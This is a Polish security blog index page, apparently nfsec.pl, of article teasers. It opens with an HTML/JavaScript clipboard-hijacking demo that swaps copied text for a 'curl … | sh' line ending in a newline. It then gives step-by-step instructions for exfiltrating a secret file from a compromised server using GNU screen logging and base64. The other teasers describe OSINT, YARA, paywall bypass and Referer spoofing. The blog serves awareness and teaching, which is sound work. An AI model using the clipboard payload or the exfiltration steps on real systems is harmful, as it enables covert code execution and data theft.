K

ilka lat temu dowiedzieliśmy się, że kopiowanie poleceń bezpośrednio do terminala może mieć trochę inne konsekwencję niż byśmy mogli się spodziewać. Dzisiaj nowoczesne API Javascript pozwalają witrynie internetowej w trywialny sposób zastępowanie tego, co umieścisz w schowku, bez potwierdzenia lub zgody użytkownika. Poniżej znajduje się przykład tego, jak łatwo jest wykonać ten atak:

<html>
<head>
<title>Kopiuj wklej demo</title>
</head>
<body>
<p id="skopiujmnie">$ echo "Wklej mnie do terminala!"</p>
<script>
document.getElementById('skopiujmnie').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain', 'echo "A jednak wykonamy \
[curl https://nfsec.pl | sh]"\n');
e.preventDefault();
});
</script>
</body>
</html>

Powyższy kod możemy zapisać jako plik payload.html, wyświetlić w przeglądarce – zaznaczyć, skopiować wyświetlony tekst i wkleić do terminala. Należy zauważyć, że nie musimy nawet naciskać klawisza ENTER po wklejeniu, ponieważ ładunek kodu zawiera znak nowej linii, która to zrobi za nas.

Więcej informacji: Don’t Copy Paste Into A Shell

D

ane z serwerów możemy wyprowadzać za pomocą różnego rodzaju tuneli ukrytych w protokołach. Możemy też wykorzystać do tego celu menedżer okien terminala – screen, który będzie tylko i wyłącznie zainstalowany na naszym lokalnym komputerze. Dla przykładu prześlemy plik o wielkości 1092 KB z zdalnego serwera na nasz lokalny komputer:

• Uruchamiamy polecenie screen na lokalnym komputerze i łączymy się z zdalnym serwerem, do którego uzyskaliśmy dostęp,
• Naciskamy sekwencję klawiszy: Ctrl+a : – po pojawieniu się znaku zachęty : w lewym, dolnym rogu wpisujemy: logfile dataout.txt i naciskamy Enter,
• Kolejną sekwencją definiującą początek zapisu strumienia danych do pliku dataout.txt jest: Ctrl+a H,
• Dane prześlemy zakodowane base64 wydając polecenie: openssl base64 < tajne_dane.txt,
• Kończymy strumień danych i wyzwalamy zapis pliku tą samą sekwencją, co rozpoczęcie: Ctrl+a H.

W drugiej konsoli teraz już na lokalnym komputerze możemy oczyścić plik wycinając pierwszą (polecenie) i ostatnią (znak zachęty powłoki) linię przy okazji dekodując plik:

cat dataout.txt | tail -n +2 | head -n -1 | openssl base64 -d

[ czytaj całość… ]

O

pisana tutaj metoda nie jest najbardziej zaawansowaną techniką obronną małych instalacji serwerów WWW na świecie, ale bazuje ona na bardzo prostym mechanizmie, który przy spełnieniu jednego warunku potrafi zablokować trochę szajsu krążącego po internecie. Zacznijmy od charakterystyki ruchu w internecie. Bardzo często porównywany on jest do infostrady, po której ciągle pędzą jakieś dane. Wyobrazimy teraz sobie, że internet to jedna wielka autostrada ułożona w linii prostej, a każdy z niej zjazd prowadzi do jakiegoś serwera. Na długości całej autostrady, jak i przy każdym zjeździe poprowadzone są osłony energochłonne. Poprawny ruch do serwera powinien zawsze odbywać się tylko i wyłącznie po wyznaczonej drodze – bez dotykania barier.
[ czytaj całość… ]

C

o roku ukazuje się nowa edycja podręcznika OSINT wydawanego przez I-Intelligence. Ogromny plik PDF, który można pobrać bezpłatnie. Zawiera ponad 500 stron wypełnionych linkami. Podręcznik jest przeznaczony nie tylko dla doświadczonych badaczy i specjalistów ds. bezpieczeństwa informacji, ale dla każdego, kto chce poprawić jakość swojej wiedzy, niezależnie od tego, na jakim etapie kariery się znajduje. Szczególnie nowicjusze w OSINT mogą wykorzystać narzędzia z różnych kategorii, aby rozwinąć swoją naukę. Przecież dobry praktyk OSINT to ktoś, kto czuje się komfortowo w pracy z różnymi narzędziami, źródłami i strategiami zbierania informacji. Pokusa wąskiej specjalizacji w OSINT to taka, której należy się oprzeć. Czemu? Ponieważ żadne zadanie badawcze nigdy nie jest tak uporządkowane, jak sugeruje to zlecenie.

E

FF Threat Lab spędza dużo czasu na szukaniu złośliwego oprogramowania, które atakuje podatne grupy, ale również klasyfikuje próbki złośliwego oprogramowania, z którymi się spotykają. Jednym z narzędzi, którego używają jest YARA opisana jako szwajcarski nóż dla badaczy złośliwego oprogramowania. Społeczność badaczy malware zgromadziła przez lata wiele przydatnych reguł YARA i wiele z nich wykorzystywanych jest w różnych badaniach. Jednym z takich repozytoriów reguł YARA jest przewodnik Awesome YARA, który zawiera odnośniki do dziesiątek wysokiej jakości repozytoriów YARA.
[ czytaj całość… ]

K

iedy wykonujemy program Python to w tle wykonuje się najpierw kompilacja kodu źródłowego (instrukcje znajdujące się w danym pliku .py) do formatu zwanego jako kod bajtowy. Kompilacja to proces tłumaczenia kodu na inny format, a w tym wypadku kod bajtowy jest niskopoziomową, niezależną od platformy reprezentacją kodu źródłowego. Język programowania Python przekłada każdą z instrukcji źródłowych na grupę instrukcji kodu bajtowego poprzez podzielenie ich na pojedyncze kroki. Proces przekładania kodu źródłowego na kod bajtowy odbywa się z myślą o szybkości wykonania – kod bajtowy może działać o wiele szybciej od oryginalnych instrukcji z kodu źródłowego zawartego w pliku tekstowym.
[ czytaj całość… ]

Dokument Jeffa Orłowskiego opublikowany na platformie Netflix przedstawia jeden z najstarszych typów gatunku horroru – naukowca, który posunął się za daleko. Tym naukowcem są media społecznościowe, a bardziej firmy które je stworzyły. Film prezentuje rzeczywistość, która może wydawać się zbyt kolosalna i abstrakcyjna dla laika. Dlatego zostaje zeskalowana do poziomu codziennego życia rodziny, która jest „nękana” przez rozpraszacze naszych czasów. W celu nadania powagi dla tez stawianych w dokumencie możemy spotkać się z takimi osobami jak: Justin Rosenstein (jeden z współtwórców facebookowego przycisku „lubię to”), Tim Kendall (były dyrektor ds. monetyzacji Facebooka oraz Tim Kendall oraz były szef Pinteresta), Guillaume Chaslot (twórca polecanych video na YouTube), Cathy O’Neil (autorka książki Broń statystycznego rażenia) oraz Tristan Harris (etyk projektowy w Google).
[ czytaj całość… ]

W

raz z pojawieniem się płatnych treści wiele serwisów nie mogło pozwolić sobie na zablokowanie ruchu do nich z poziomu wyszukiwarki Google. Dlatego przepuszczało Googleboty na „specjalnych warunkach”. Przez jakiś czas do tego typu treści można było dostać się poprzez udawanie, że jesteśmy Googlebotem – ręcznie edytując ustawienia przeglądarki lub używając specjalnych wtyczek. Jak bardzo serwisy lubią się z Google mogliśmy przekonać się na przykładzie LinkedIn, który w poprzedniej wersji interfejsu pozwalał na pobieranie nawet zastrzeżonych profili z poziomu testów optymalizacji mobilnej Google.
[ czytaj całość… ]

Whatever you do
Don’t tell anyone
– Queens Of The Stone Age – The Lost Art Of Keeping A Secret

Nick Bilton opowiada nam o typowym dwudziestolatku, który studiował fizykę, grał na bębnach, chodził na randki. Równolegle pracował nad życiowym dziełem, które miało mu przynieść sławę. W 2011 roku założył platformę Silk Road – sklep internetowy oferujący łatwy zakup wszystkiego, co nielegalne. Bez względu na to, czy zamówienie dotyczyło heroiny, cyjanku czy nerki, wystarczyło jedno kliknięcie, zaszyfrowana płatność bitcoinami i towar lądował pod drzwiami klienta. Jednak jak zawsze w przypadku czarnego rynku, także Silk Road utonął w jego brutalnej naturze – stając się wirtualnym kartelem, w którym każdy szczur chce odgryźć kawałek sera dla siebie.
[ czytaj całość… ]

Pierwszy raz z opisem ataku HTTP Referer Spoofing spotkałem się w 2008 roku na łamach magazynu Linux+. Paweł Szcześniak opisał, jak za pomocą tej metody możemy wstrzykiwać odnośniki do agresywnej strony w innych systemach statystycznych w celu zwiększenia pozycji SEO – z oryginałem publikacji, który został udostępniony za darmo przez wydawcę możemy zapoznać się tutaj. Rozważmy teraz, jakie inne konsekwencje może nam przynieść taki atak – oraz czy istnieje możliwość jego dostosowania do dzisiejszych systemów statystycznych.
[ czytaj całość… ]